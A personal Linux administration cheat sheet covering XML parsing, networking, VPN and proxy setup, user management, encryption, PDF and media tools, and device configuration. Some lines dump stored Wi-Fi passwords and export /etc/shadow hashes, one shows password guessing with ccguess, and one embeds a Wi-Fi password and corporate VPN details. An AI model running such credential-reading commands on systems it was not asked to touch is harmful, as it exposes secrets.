parsing xml parsing xml processing

xq

# installation
pip3 install xq
# xq usage ??? is it not working as expected ????

parse xml with xpath

# installation
sudo apt install libxml-xpath-perl
# parse xml from stdin
curl -s https://www.w3schools.com/xml/note.xml | xpath -e '/note/to | /note/from'
curl -s https://www.w3schools.com/xml/note.xml | xpath -e '/note/to/text()'

parse xml with xmllint

# installation
sudo apt  install libxml2-utils

## usage
TEMP_FILE=$(mktemp)
curl -s https://www.w3schools.com/xml/note.xml > $TEMP_FILE
xmllint --xpath '//note/from' $TEMP_FILE
xmllint --xpath 'string(//note/to)' $TEMP_FILE
xmllint --xpath '//note/to/text()' $TEMP_FILE

# avoid xmllint namespace check
xmllint --xpath "//*[local-name()='project']/*[local-name()='modules']/*[local-name()='module']/text()" pom.xml
# avoid issue with xmllint namespace
cat pom.xml | sed '2 s/xmlns=".*"//g' | xmllint --xpath "/project/modules/module/text()" -

# debug xml xpath debug 
xmllint --shell  $TEMP_FILE
rm $TEMP_FILE

xml pretty print, xml format

xmllint --format /path/to/file.xml > /path/to/file-formatted.xml

xml validation

xmllint --noout file.xml; echo $?
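
# validation against an XSD schema ( assuming a schema file schema.xsd )
xmllint --noout --schema schema.xsd file.xml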

html

html prettifier

# sudo apt install tidy
cat index.html | tidy -i -q

parse html parsing

# sudo apt install libxml-xpath-perl
xpath -e $path $filename
# Parse HTML and extract specific elements
xmllint --html --xpath  $path $filename

hq installation

pip install hq

# or https://pypi.org/project/hq/0.0.4/#files
# sudo python3 setup.py install

hq usage

curl https://www.w3schools.com/xml | hq '`title: ${/head/title}`'
cat index.html | hq '/html/body/table/tr/td[2]/a/text()'
# retrieve all classes
cat p1-utf8.txt | hq '/html/body/table//p/@class'
# retrieve all texts from 'p'
cat p1-utf8.txt | hq '/html/body/table//p/text()'
# retrieve all texts from 'p' with condition
cat p1-utf8.txt | hq '/html/body/table//p[@class="MsoNormal"]/text()'
# retrieve html tag table
cat p1-utf8.txt | hq '//table'

cat $filename | hq '`Hello, ${/html/head/title}!`'

# https://www.w3.org/TR/xquery-31/#id-flwor-expressions
hq -f $filename '
let $path := /html/body/ul/li[*];
for $el in $path
    let $title:=`${ $el/span/div/div/div/div[2]/div[3]/div/div[1]/div/div[1]/div[1]/h2 }`
    let $price1:=`${ $el/span/div/div/div/div[2]/div[3]/div/div[1]/div/div[1]/div[2]/div[1]/div/span/span[1] }`
    let $price2:=`${ $el/span/div/div/div/div[2]/div[3]/div/div[1]/div/div[1]/div[2]/div[2]/div/span[1]/span[1] }`

    let $price:=if ($price1) then $price1 else $price2

    return `$title | $price `'

hq -f $filename '
let $path := /html/body/div[1]/li[*];
for $el in $path
    return `${ $el/article/div[2]/div[2]/h2/a } | https://www.example.de/${ $el/a/@href }`'

network

ip address of the site show ip address of remote host ip address

host google.com
dig mail.ru

print all networks

ip -4 a
ip -6 a

print all network interfaces all wifi devices

ip link show   # or: cat /etc/network/interfaces
ifconfig
nmcli d

print all wifi passwords

sudo cat /etc/NetworkManager/system-connections/* | grep -e ^ssid -e ^psk

switch on and off network interface

sudo ifdown lo && sudo ifup lo

restart network, switch off all interfaces

sudo service network-manager restart

vpn connection, connect to network

# status of all connections
nmcli d
nmcli connection
nmcli connection up id {name from previous command}
nmcli connection down id {name of connection}

connect to wifi

wifi_code='188790542'
point="FRITZ!Box 7400 YO"
nmcli device wifi connect  "$point" password $wifi_code
# sudo cat /etc/NetworkManager/system-connections/*

raw vpn connection

sudo openconnect --no-proxy {ip-address} --user=$VPN_USER $URL_VPN
sudo openconnect --no-cert-check --no-proxy --user=$VPN_USER --servercert $URL_VPN
openconnect $URL_VPN --interface=vpn0 --user=$(id -un) --authgroup=YubiKey+PIN -vv --no-proxy --no-dtls

FILE_CERT_CA=WLAN_CA.crt
FILE_USER_KEY=xxx.ubs.corp.key
FILE_USER_CERT=xxx.ubs.corp.crt
URL_VPN=https://vpn.ubs.com
USER_VPN=xxxyyyzzz
sudo openconnect --no-proxy --user=$USER_VPN --authgroup='YubiKey+PIN' --cafile=$FILE_CERT_CA --sslkey=$FILE_USER_KEY --certificate=$FILE_USER_CERT $URL_VPN	

openvpn vpn connection

# apt install network-manager-openvpn
sudo openvpn file_config.ovpn

# vpn-auth - text file with two lines: login and password
sudo openvpn --config 1.ovpn --auth-user-pass $DIR_PROJECT/vpn-auth.txt

ipv6

warning: can lead to "black screen" on ubuntu /etc/sysctl.d/60-ipv6-disable.conf

net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
net.ipv6.conf.lo.disable_ipv6 = 1

or

nmcli con show # select target network
nmcli con show 'target-network'

## disable/deactivate ipv6
# nmcli con modify 'target-network' ipv6.method disabled
# nmcli con modify 'target-network' ipv6.method ignore
# sudo sysctl -w net.ipv6.conf.all.disable_ipv6=1

## enable/activate ipv6
nmcli con show 'target-network'
nmcli con modify 'target-network' ipv6.method auto
sudo sysctl -w net.ipv6.conf.all.disable_ipv6=0
nmcli con show 'target-network' | grep ipv6.method

## apply settings
sudo systemctl restart NetworkManager

debug network collaboration, ip packages

example with reading redis collaboration ( package sniffer )

sudo ngrep -W byline -d docker0 -t '' 'port 6379'

debug connection, print collaboration with remote service, sniffer

#                    1------------     2--------------------     3--------------
sudo tcpdump -nvX -v src port 6443 and src host 10.140.26.10 and dst port not 22
# and, or, not

keystore TrustStore

TrustStore holds the certificates of external systems that you trust.
So a TrustStore is a KeyStore file, that contains the public keys/certificate of external hosts that you trust.

## list of certificates inside truststore 
keytool -list -v -keystore ./src/main/resources/com/ubs/crm/data/api/rest/server/keystore_server
# maybe will ask for a password

## generating ssl key stores
keytool -genkeypair -keystore -keystore ./src/main/resources/com/ubs/crm/data/api/rest/server/keystore_server -alias serverKey -dname "CN=localhost, OU=AD, O=UBS AG, L=Zurich, ST=Bavaria, C=DE" -keyalg RSA
# enter password...

## Importing ( updating, adding ) trusted SSL certificates
keytool -import -file ~/Downloads/certificate.crt -keystore ./src/main/resources/com/ubs/crm/data/api/rest/server/keystore_server -alias my-magic-number

in other words, rsa certificate rsa from url x509 url:

  1. Download the certificate by opening the url in the browser and downloading it there manually.
  2. Run the following command: keytool -import -file <name-of-downloaded-certificate>.crt -alias <alias for exported file> -keystore myTrustStore
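
alternative to the browser: pull the certificate with openssl ( host name below is a placeholder ):

HOST=my.host.name
openssl s_client -connect $HOST:443 -servername $HOST </dev/null 2>/dev/null | openssl x509 -outform PEM > $HOST.crt
keytool -import -file $HOST.crt -alias $HOST -keystore myTrustStore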

DNS

# check 
sudo resolvectl status | grep "DNS Servers"
systemd-resolve --status
systemctl status systemd-resolved

# restart
sudo systemctl restart systemd-resolved

# current dns
sudo cat /etc/resolv.conf
# resolving hostname
dig google.com

aws example ( 10.0.0.2 is the AWS internal DNS server ): sudo vim /etc/resolv.conf

# nameserver 127.0.0.53
nameserver 10.0.0.2
options edns0 trust-ad
search ec2.internal

proxy

proxy local, proxy for user /etc/profile.d/proxy.sh

export HTTP_PROXY=http://webproxy.host:3128
export http_proxy=http://webproxy.host:3128
export HTTPS_PROXY=http://webproxy.host:3128
export https_proxy=http://webproxy.host:3128
export NO_PROXY="localhost,127.0.0.1,.host,.viola.local"
export no_proxy="localhost,127.0.0.1,.host,.viola.local"

global proxy, proxy global, system proxy, proxy system /etc/apt/apt.conf

Acquire::http::proxy "http://proxy.company.com:80/";
Acquire::https::proxy "https://proxy.company.com:80/";
Acquire::ftp::proxy "ftp://proxy.company.com:80/";
Acquire::socks5::proxy "socks://127.0.0.1:1080/";

global proxy, proxy global, system proxy, proxy system /etc/environment

http_proxy=http://webproxy.host:3128
no_proxy="localhost,127.0.0.1,.host.de,.viola.local"

for application

create environment for http

sudo gedit /etc/systemd/system/{service name}.service.d/http-proxy.conf

[Service]
Environment="http_proxy=http://user:[email protected]:8080"

create environment for https

sudo gedit /etc/systemd/system/{service name}.service.d/https-proxy.conf
[Service]
Environment="https_proxy=http://user:[email protected]:8080"

service list of services

systemctl list-unit-files --type=service

restart service restart service stop service start

sudo systemctl daemon-reload
sudo systemctl restart {service name}
# or
sudo service {service name} stop
sudo service {service name} start

check service status

sudo systemctl is-active {service name}

enable automatic start disable autostart disable service

sudo systemctl enable {service name}
sudo systemctl disable {service name}

service check logs

systemctl status {service name}
journalctl -u {service name} -e
# print all units
journalctl -F _SYSTEMD_UNIT

# system log
journalctl -f -l 
# system log for app log
journalctl -f -l -u python -u mariadb
# system log since the last 300 seconds
journalctl -f -l -u httpd -u mariadb --since -300

check settings

systemctl show {service name} | grep proxy

for snapd

# export SYSTEM_EDITOR="vim"
# export SYSTEMD_EDITOR="vim"
sudo systemctl edit snapd.service
# will edit: /etc/systemd/system/snapd.service.d/override.conf

add next lines

[Service]
Environment=http_proxy=http://proxy:port
Environment=https_proxy=http://proxy:port

restart service

sudo systemctl daemon-reload
sudo systemctl restart snapd.service

snap proxy settings

sudo snap set system proxy.http="http://user:[email protected]:8080"
sudo snap set system proxy.https="http://user:[email protected]:8080"
export proxy_http="http://user:[email protected]:8080"
export proxy_https="http://user:[email protected]:8080"
sudo snap search visual 

users/group

add user into special group, add user to group

  • adduser {username} {destination group name}
  • edit file /etc/group
add :{username} to the end of line with {groupname}:x:999

create/add user, create user with admin rights

sudo useradd test

sudo useradd --create-home test --groups sudo 
# set password for new user
sudo passwd test
# set default bash shell 
chsh --shell /bin/bash test

sudo for user, user sudo, temporary provide sudo

sudo adduser vitalii sudo
# close all opened sessions
# after your work done
sudo deluser vitalii sudo

admin rights for script, sudo rights for script, execute as root

sudo -E bash -c 'python3'

remove user

sudo userdel -r test

create group, assign user to group, user check group, user group user roles hadoop

sudo groupadd new_group
usermod --append --groups new_group my_user
id my_user

create folder for group, assign group to folder

chgrp new_group /path/to/folder

execute sudo with current env variables, sudo env var, sudo with proxy

sudo -E <command>

execute script with current env variables send to script

. ./airflow-get-log.sh
source ./airflow-get-log.sh
cat dag-runs-failed.id | . ./airflow-get-log.sh

print all logged in users, active users, connected users

users
w
who --all

send message to user, message for other users

write <username> <message>
sudo wall -n 'hello all logged in users '

print all users registered users into system

cat /etc/passwd | cut --delimiter=: --fields=1

copy users, import/export users

# replace LIMIT with the minimal UID of the accounts to export ( e.g. 1000 for regular users )
sudo awk -F: '($3>=LIMIT) && ($3!=65534)' /etc/passwd > passwd-export
sudo awk -F: '($3>=LIMIT) && ($3!=65534)' /etc/group > /opt/group-export
sudo awk -F: '($3>=LIMIT) && ($3!=65534) {print $1}' /etc/passwd | tee - | egrep -f - /etc/shadow > /opt/shadow-export
sudo cp /etc/gshadow /opt/gshadow-export

issue with ssh, ssh connection issue

when you see message:

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

use this:

ssh-keygen -R <host>

or

rm ~/.ssh/known_hosts

tools

virtual machines

mapping keys, keymap, assign actions to key

show key codes

xmodmap -pke
# or take a look into "keycode ... " 
xev 

remap key 'Druck' to 'Win'

xmodmap -e "keycode 107 = Super_L"

to reset

setxkbmap

make ctrl+alt the same as alt+ctrl, make ctrl+shift the same as shift+ctrl

keycode 50 = Shift_L NoSymbol Shift_L
keycode 62 = Shift_R NoSymbol Shift_R
keycode 37 = Control_L NoSymbol Control_L
keycode 105 = Control_R NoSymbol Control_R

keycode 64 = Alt_L Meta_L Alt_L Meta_L
keycode 108 = Alt_R Meta_R Alt_R Meta_R
keycode 37 = Control_L NoSymbol Control_L
keycode 105 = Control_R NoSymbol Control_R

save to use during each reboot

echo "keycode 107 = Super_L" >> ~/.Xmodmap
echo "xmodmap ~/.Xmodmap" >> ~/.xprofile

find key code

xev | grep keysym

key code, scan code, keyboard code

sudo evtest 
sudo evtest /dev/input/event21

remap [hjkl] to [Left, Down, Up, Right], cursor hjkl: option 2

mapping list
for using in a VisualCode-like environment: GTK_IM_MODULE="xim" code $*
content of $HOME/.config/xmodmap-hjkl:

keycode 66 = Mode_switch
keysym h = h H Left 
keysym l = l L Right
keysym k = k K Up
keysym j = j J Down
keysym u = u U Home
keysym m = m M End
keysym y = y Y BackSpace
keysym n = n N Delete

execute re-mapping, permanent solution

# vim /etc/profile
xmodmap $HOME/.config/xmodmap-hjkl

remap reset, reset xmodmap

setxkbmap -option

move mouse, control X server

apt-get install xdotool
# move the mouse  x    y
xdotool mousemove 1800 500
# left click
xdotool click 1

please check that you are using Xorg and not Wayland (window system):

# uncomment false
cat /etc/gdm3/custom.conf | grep WaylandEnable

how to check your current display server(window system):

# x11 - xorg
# wayland
echo $XDG_SESSION_TYPE

another possible solution for moving mouse cursor

apt-get install xautomation
xte 'mousemove 200 200'

terminal title

set-title(){
  ORIG=$PS1
  TITLE="\e]2;$@\a"
  PS1=${ORIG}${TITLE}
}

set-title "my title for terminal"

code/decode

encrypt decrypt

encrypt file, decrypt file, encode/decode

gpg --symmetric {filename}
gpg --decrypt {filename}
# encrypt
# openssl [encryption type] -in [original] -out [output file]
openssl des3 -in original.txt -out original.txt.encrypted
# decrypt
# openssl [encryption type] -d -in [encrypted file] -out [original file]
openssl des3 -d -in original.txt.encrypted -out original.txt

# list of encryptors (des3):
openssl enc -list

encrypt decrypt

sudo apt install ccrypt
# encrypt file
ccencrypt file1.txt
# ccencrypt file1.txt --key mysecretkey
# print decrypted content
ccat file1.txt.cpt
# decrypt file
ccdecrypt file1.txt.cpt
# ccdecrypt file1.txt.cpt --key mysecretkey
# try to guess password
# ccguess file1.txt.xpt

base64

# !!! important !!! will produce line with suffix "\n" 
base64 cAdvisor-start.sh | base64 --decode
echo "just a text string" | base64 | base64 --decode

# !!! important !!! will produce line WITHOUT suffix "\n" 
echo -n "just a text string " | base64 
printf "just a text string " | base64 

md5 digest

md5sum filename
# check control sum 
echo "$(cat $filename) $filename" | md5sum -c

sha224sum filename
echo -n foobar | sha256sum
sha384sum filename
sha512sum filename
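
# typical check pattern: create a checksum file and verify it later ( file name is just an example )
sha256sum my-archive.tar.gz > my-archive.tar.gz.sha256
sha256sum -c my-archive.tar.gz.sha256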

check pgp signature check control sum

sig_file=`ls ~/Downloads/*.sig`
original_file="${sig_file%.sig}"
gpg --verify $sig_file $original_file

check open pgp signature

# tails-amd64-5.22.img   tails-amd64-5.22.img.sig   tails-signing.key
gpg --import tails-signing.key
gpg --verify tails-amd64-5.22.img.sig tails-amd64-5.22.img

driver install hardware

sudo ubuntu-drivers autoinstall
reboot

hardware serial numbers, hardware id, hardware version, system info

sudo dmidecode --string system-serial-number
sudo dmidecode --string processor-family
sudo dmidecode --string system-manufacturer
# disk serial number
sudo lshw -class disk

equipment system devices

inxi -C
inxi --memory
inxi -CfxCa

images

convert image like png or gif or jpeg... to jpg, transform image from one format to another

# sudo apt-get install imagemagick
convert input.png output.jpg
convert input.png -crop $WIDTHx$HEIGHT+$X+$Y output.jpg
convert input.png -resize 50% output.jpg
convert input.png -quality 75 output.jpg
convert input.png -background white -flatten output.jpg

convert image to vector graphics

# sudo apt-get install potrace
INPUT_IMAGE=strategy-Decision-de-centralized.jpg
OUTPUT_IMAGE=$INPUT_IMAGE".pgm"
convert $INPUT_IMAGE -depth 8 -colorspace Gray -format pgm $OUTPUT_IMAGE

rifle $OUTPUT_IMAGE
potrace $OUTPUT_IMAGE -s

convert text to image

# list of all fonts: `fc-list`
# transparent background: xc:none
convert -size 800x600     xc:white -font "Garuda" -pointsize 20 -fill black -annotate +50+50 "some text\n and more \n lines" $OUTPUT_FILE

insert image into another image, image composition

convert input_image.jpg overlay_image.png -gravity center -composite output_image.png
convert input_image.jpg overlay_image.png -geometry 50%x50%+0+0 -composite output_image.png

qr, bar-codes

qr code online generator

http://goqr.me/api/doc/create-qr-code/
http://api.qrserver.com/v1/create-qr-code/?data=HelloWorld!&size=100x100
https://qr-creator.com/url.php
https://qrgenerator.org/

qr code generator

# generate qrcode
# sudo apt install qrencode
qrencode --size 6 --level H --output="test-text.png" "test text"
echo "output from pipe" | qrencode --size 6 --level H --output="test-text.png" 

bar code scanner qr code scanner

# bar code scanner QR code scanner
sudo apt install zbar-tools
zbarimg ~/path-to-screenshot-of-barcode.png

bar code finder

apt install zbar-tools
zbarimg <file>

barcode - for pdf only

pdf

convert pdf to image

FILE_SOURCE="certificate_Vitalii.pdf"
pdftoppm -png $FILE_SOURCE  $FILE_SOURCE
# pdftoppm -mono -jpeg $FILE_SOURCE $FILE_SOURCE

# tesseract $FILE_SOURCE-1.png - -l eng
convert -geometry 400x600 -density 100x100 -quality 100 test-pdf.pdf test-pdf.jpg

bar code create into pdf

barcode -o 1112.pdf -e "code39" -b "1112" -u "mm" -g 50x50

pdf watermark, merge pdf files into one

pdftk original.pdf stamp watermark.pdf output output.pdf

pdf file merge, pdf join

# -dAutoRotatePages=/None 
gs -dBATCH -dNOPAUSE -q -sDEVICE=pdfwrite -sOutputFile=finished.pdf test-pdf2.pdf test-pdf3.pdf test-pdf4.pdf
rm finished.pdf; gs -dBATCH -dNOPAUSE -q -sDEVICE=pdfwrite -sOutputFile=finished.pdf -dDEVICEWIDTH=612 -dDEVICEHEIGHT=792 *.pdf
rm finished.pdf; gs -dBATCH -dNOPAUSE -q -sDEVICE=pdfwrite -sOutputFile=finished.pdf -dDEVICEWIDTH=612 -dDEVICEHEIGHT=792 -dPAGEWIDTH=612 -dPAGEHEIGHT=792 -dFIXEDMEDIA *.pdf

for each_file in *.pdf; do
    gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -dQUIET -dBATCH -sOutputFile="$each_file-resized" "$each_file"
done

rm finished.pdf; pdftk *.pdf cat output finished.pdf

pdf file decrease size pdf compression

# -dPDFSETTINGS=/screen — Low quality and small size at 72dpi.
# -dPDFSETTINGS=/ebook — Slightly better quality but also a larger file size at 150dpi.
# -dPDFSETTINGS=/prepress — High quality and large size at 300 dpi.
# -dPDFSETTINGS=/default — System chooses the best output, which can create larger PDF files.

gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -dQUIET -dBATCH -sOutputFile=output.pdf input.pdf

doc to pdf, convert to pdf

libreoffice --headless --convert-to pdf "/home/path/Dativ.doc" --outdir /tmp/output

pdf to text, extract text from pdf, convert pdf to text

pdftotext file.pdf -

epub to pdf

apt install calibre
ebook-convert input.epub output.pdf

zip

unzip bz2

bzip2 -dc ricochet-1.1.4-src.tar.bz2 | tar xvf -

gzip unzip gzip decompress

gzip -d out.gz
# unknown suffix -- ignored
# add "gz" suffix to file

console and clipboard

alias clipboard="xclip -selection clipboard" 
alias clipboard-ingest="xclip -selection clipboard"
function clipboard-copy-file(){
    xclip -in -selection c $1
}
alias clipboard-print="xclip -out -selection clipboard"

screenshot, copy screen

screenshot(){
	file_name="/home/user/Pictures/screenshots/screenshot_"`date +%Y%m%d_%H%M%S`".png"
	scrot $file_name -s -e "xdg-open $file_name"
}

printer managing ( add/remote/edit )

in case of authorization issue:

edit /etc/cups/cupsd.conf: change the AuthType to None and comment out the "Require user @SYSTEM" line:

<Limit CUPS-Add-Modify-Printer CUPS-Delete-Printer CUPS-Add-Modify-Class CUPS-Delete-Class CUPS-Set-Default CUPS-Get-Devices>
AuthType None
# AuthType Default
# Require user @SYSTEM
Order deny,allow
</Limit>

and restart the service

sudo service cups restart

default printer

# show all printer drivers in system
lpinfo -m

# print all printer names
lpstat -l -v
# device for Brother_HL_L8260CDW_series: implicitclass://Brother_HL_L8260CDW_series/

# set default printer
PRINTER_NAME=Brother_HL_L8260CDW_series
sudo lpadmin -d $PRINTER_NAME

printer queue

lpq -P $PRINTER_NAME

print to printer

lpr -P $PRINTER_NAME myfile.txt
lpr -P $PRINTER_NAME -o fit-to-page=false -o position=top $out_file

kernel related messages

dmesg --level=err,warn
dmesg --follow
# save all messages /var/log/dmesg
dmesg -S

disk usage

df -ha
# with visualization
ncdu

create startup disk, write iso image, usb stick, bootable drive, restore disk image

default ubuntu disk startup disk creator

for CD iso images

usb-creator-gtk

startup/bootable usb disk

for LIVE images

# list of all hard drives, disk list
sudo lshw -class disk -short
# write image
sudo dd bs=4M if=/home/my-user/Downloads/archlinux-2019.07.01-x86_64.iso of=/dev/sdb status=progress && sync

startup/bootable usb with persistence, create usb live with persistence, usb persistence, stick persistence

for a multi-boot ( parallel disk ) setup Parrot is highly recommended ( good bootloader )

sudo add-apt-repository universe
sudo add-apt-repository ppa:mkusb/ppa
sudo apt-get update
sudo apt install --install-recommends mkusb mkusb-nox usb-pack-efi

# https://parrotsec.org/download/
cd ~/Downloads; wget https://deb.parrot.sh/parrot/iso/6.0/Parrot-home-6.0_amd64.iso
mkusb Parrot-home-6.0_amd64.iso
# Install, persistent live, uefi
# steps: p(persistent), p(dus-Persistent)

split usb drive, split disk

# detect disks
sudo lshw -class disk -short
sudo fdisk -l

# format drive
DEST_DRIVE=/dev/sdb
sudo dd if=/dev/zero of=$DEST_DRIVE  bs=512  count=1
# sudo mke2fs -t xfs $DEST_DRIVE

# split drive, split disk, split usb
sudo parted $DEST_DRIVE
print
rm 1
rm 2

mklabel msdos

mkpart primary ext4 0.0 5GB
I

mkpart extended ntfs 5GB -1s

print 
set 1 boot on
set 2 lba on
quit
sudo fdisk -l

time command resource consumption command exec information

\time -v date

command time consumption

time curl google.com

elapsed time between two commands

STARTTIME=$SECONDS
sleep 2
echo $SECONDS-$STARTTIME
STARTTIME=`date +%s.%N`
sleep 2.5
ENDTIME=`date +%s.%N`
TIMEDIFF=`echo "$ENDTIME - $STARTTIME" | bc | awk -F"." '{print $1"."substr($2,1,3)}'`

language translator

sudo apt-get install translate-shell
trans -source de -target ru -brief "german sentence"

gnome

remove emoji

ibus-setup
# go to emojii and remove shortcuts

video

join mp4 fusion mp4

ffmpeg -i video.mp4 -i audio.mp4 output.mp4

join images to mp4, convert images to video

# in the current folder there are JPEG files in proper order
ffmpeg -framerate 0.5 -pattern_type glob -i "*.jpeg" output.mp4

convert webm video to mp3

FILE_INPUT=video.webm
FILE_OUTPUT=audio.mp3
ffmpeg -i $FILE_INPUT -vn -ab 64k -ar 44100 -y $FILE_OUTPUT

convert mp4 to mp3 with slow playing

file_input="Cybercity.mp4"
file_output="Cybercity.mp3"
ffmpeg -i $file_input -vn -acodec libmp3lame -q:a 4 -filter:a "atempo=0.75" $file_output

sound

join files

sox 1.wav 2.wav 3.wav 4.wav output.wav
ffmpeg -i 1.wav -i 2.wav -i 3.wav -filter_complex '[0:a][1:a][2:a]concat=n=3:v=0:a=1' output.wav

split mp3 files

mp3splt -s -p nt=10 album.mp3

speech to text

text to speech, text to voice

## more or less
sudo apt install libttspico-utils
pico2wave -w output.wav "this is text-to-speech conversion"; rifle output.wav

# too metallic 
sudo apt install espeak
espeak -w output.wav "Just a text"

## also too metallic
sudo apt install festival
echo "This is text saved as audio." | text2wave -o output.wav; rifle output.wav

calculator arithmetic operations add sub div multiply evaluation

expr 30 / 5
myvar=$(expr 1 + 1)
python3 -c "print(4*3)"
perl -e "print 4*3"

dc desk calculator

echo "2 3 + p" | dc

basic calculator

echo "4+5" | bc
bc <<< 4+5
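# bc does integer division by default; set scale for decimal places
echo "10/3" | bc          # 3
echo "scale=3; 10/3" | bc # 3.333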

interactive calculator

bc -l -i

interactive arithmetic calculator

calc
qalc

shell examples

byobu

sudo apt install byobu

LD Library

extend path and check it

# /snap/core20/2434/usr/lib/x86_64-linux-gnu/libssl.so.1.1
export LD_LIBRARY_PATH=/snap/core20/2434/usr/lib/x86_64-linux-gnu:$LD_LIBRARY_PATH

ldconfig -p | grep libssl

Issues

issue with go package installation

>pkg-config --cflags  -- devmapper
Package devmapper was not found in the pkg-config search path.
Perhaps you should add the directory containing `devmapper.pc'
to the PKG_CONFIG_PATH environment variable
No package 'devmapper' found
sudo apt install libdevmapper-dev
export PKG_CONFIG_PATH=`echo $(pkg-config --variable pc_path pkg-config)${PKG_CONFIG_PATH:+:}${PKG_CONFIG_PATH}`

Linux devices

install drivers, update drivers ubuntu

sudo ubuntu-drivers autoinstall

zbook nvidia hp zbook hp nvidia

sudo prime-select query
# should be nvidia
sudo ubuntu-drivers devices
# sudo ubuntu-drivers autoinstall - don't use it
sudo apt install nvidia-driver-455
# or 390, 415, .... and restart

apple keyboard, alternative

echo 'options hid_apple fnmode=2 iso_layout=0 swap_opt_cmd=0' | sudo tee /etc/modprobe.d/hid_apple.conf
sudo update-initramfs -u -k all

video camera, camera settings, webcam setup

# camera utils installation
sudo apt install v4l-utils
sudo apt install qv4l2
# list of devices
v4l2-ctl --list-devices
# list of settings
v4l2-ctl -d /dev/video0 --list-ctrls

camera settings example

# /etc/udev/rules.d/99-logitech-default-zoom.rules
SUBSYSTEM=="video4linux", KERNEL=="video[0-9]*", ATTRS{product}=="HD Pro Webcam C920", ATTRS{serial}=="BBBBFFFF", RUN="/usr/bin/v4l2-ctl -d $devnode --set-ctrl=zoom_absolute=170"

wacom tablet, wacom graphical tablet, map wacom, map tablet, tablet to display

your wacom device has two modes - PC/Android, for switching between them - press and keep for 3-4 sec two outermost buttons.

# detect your monitors and select one of the output like 'HDMI-1'
xrandr --listmonitors

# detect all wacom devices
# xsetwacom --list devices
xinput | grep -i wacom | awk -F 'id=' '{print $2}' | awk '{print $1}' | while read each_input_device
do
	# xsetwacom set 21 MapToOutput 2560x1440+1080+0
	xinput map-to-output $each_input_device HDMI-1
done

external monitor settings, external screen, external display

#!/bin/sh
xrandr --output $1 --auto
xrandr --output $2 --auto --right-of $1
xrandr --output $3 --auto --right-of $2
xrandr | grep " connected" | awk '{print $1}'
 ./monitor.sh "DP-4" "DP-1-3" "eDP-1-1"

or just install 'arandr' and generate bash script

sudo apt install arandr

bluetooth

# connect and disconnect headphones
bluetoothctl connect 00:18:09:EC:BE:FD
bluetoothctl disconnect 00:18:09:EC:BE:FD
# for manual 
sudo apt install bluez-tools
bt-device --list
bt-device --disconnect 00:18:09:EC:BE:FD
bt-device --connect 00:18:09:EC:BE:FD

output audio device, sound card, headphones

# list of all outputs
pacmd list-sinks | grep -A 1 index
# set default output as
pacmd set-default-sink 16
pacmd set-default-sink bluez_sink.00_18_09_EC_BE_FD.a2dp_sink

# list of input devices
pacmd list-sources | grep -A 1 index
# set default input device
pacmd set-default-source 6
pacmd set-default-source alsa_input.pci-0000_00_1f.3-platform-skl_hda_dsp_generic.HiFi__hw_sofhdadsp_6__source

# mute microphone mute source
pacmd set-source-mute alsa_input.pci-0000_00_1f.3-platform-skl_hda_dsp_generic.HiFi__hw_sofhdadsp_6__source true
# unmute microphone unmute source
pacmd set-source-mute alsa_input.pci-0000_00_1f.3-platform-skl_hda_dsp_generic.HiFi__hw_sofhdadsp_6__source false

control mouse from keyboard

sudo apt-get install keynav
killall keynav 
cp /usr/share/doc/keynav/keynavrc ~/.keynavrc
keynav ~/.keynavrc

example of custom configfile

clear
daemonize
Super+j start,cursorzoom 400 400
Escape end
shift+j cut-left
shift+k cut-down
shift+i cut-up
shift+l cut-right
j move-left
k move-down
i move-up
l move-right
space warp,click 1,end
Return warp,click 1,end
1 click 1
2 click 2
3 click 3
w windowzoom
c cursorzoom 400 400
a history-back
Left move-left 10
Down move-down 10
Up move-up 10
Right move-right 10

Touch screen

calibration

tool installation

sudo apt install xinput-calibrator

configuration

xinput_calibrator

list of all devices, device list, list of devices

xinput --list
cat /proc/bus/input/devices

permanent applying

vi /usr/share/X11/xorg.conf.d/80-touch.conf

disable device

xinput --disable {number from command --list}

Keyboard Lenovo

middle button

# check input source - use name(s) for next command
xinput
# create file and add content
sudo vim /usr/share/X11/xorg.conf.d/50-thinkpad.conf
Section "InputClass"
    Identifier  "Trackpoint Wheel Emulation"
    MatchProduct    "Lenovo ThinkPad Compact USB Keyboard with TrackPoint|ThinkPad Extra Buttons"
    MatchDevicePath "/dev/input/event*"
    Option      "EmulateWheel"      "true"
    Option      "EmulateWheelButton"    "2"
    Option      "Emulate3Buttons"   "false"
    Option      "XAxisMapping"      "6 7"
    Option      "YAxisMapping"      "4 5"
EndSection

recover usb drive

sudo fdisk -l
sudo lsblk
sudo fsck /dev/sdb
e2fsck -b 32768 /dev/sdb
sudo e2fsck -b 32768 /dev/sdb
sudo dd if=/dev/zero of=/dev/sdb
sudo fdisk /dev/sdb
sudo partprobe -s
sudo mkfs.vfat -F 32 /dev/sdb
sudo dd if=/dev/zero of=/dev/sdb bs=512 count=1
sudo fdisk /dev/sdb

home automation

DTMF generator

sox -n dtmf-1.wav synth 0.1 sine 697 sine 1209 channels 1
sox -n dtmf-2.wav synth 0.1 sine 697 sine 1336 channels 1
sox -n dtmf-3.wav synth 0.1 sine 697 sine 1477 channels 1

Linux applications

useful links:

XMind.ini: -vm /home/user/.sdkman/candidates/java/8.0.222-zulu/bin/java

echo $XDG_CONFIG_DIRS
locate rc.lua
# place for mouse pointer, cursor, theme
/usr/share/icons

gnome settings

gnome settings configuration customization adjuster

sudo apt install dconf-editor

examples of suppressing: monitor mode switch, show desktop

dconf-editor
# /org/gnome/mutter/keybindings/switch-monitor
# /org/gnome/desktop/wm/keybindings/show-desktop

manually can be achieved via

~/.local/share/gnome-shell/extensions/<extension-identifier>/prefs.js
~/.local/share/gnome-shell/extensions/<extension-identifier>/settings.js

remove HP default display mode switching

dconf-editor
# /org/gnome/mutter/keybindings/switch-monitor
# ['<Super>p', 'XF86Display']
# replace to
# []

gnome list of settings

# all gnome settings
gsettings list-recursively 
# one setting
gsettings get org.gnome.desktop.background picture-uri

reset Gnome to default

